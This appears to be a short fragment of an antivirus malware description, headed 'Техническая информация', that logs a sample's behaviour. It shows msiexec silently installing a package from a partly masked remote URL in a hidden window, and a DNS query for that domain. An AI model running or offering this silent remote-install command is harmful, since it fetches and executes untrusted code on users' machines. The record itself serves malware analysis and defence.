Техническая информация
- '<SYSTEM32>\msiexec.exe' serf=19 skip=1 /i http://of#####65advance.com/update /q OnStart='%WINDIR%\notepad.exe'
- http://of#####65advance.com/update
- DNS ASK of#####65advance.com
- '<SYSTEM32>\msiexec.exe' serf=19 skip=1 /i http://of#####65advance.com/update /q OnStart='%WINDIR%\notepad.exe'' (со скрытым окном)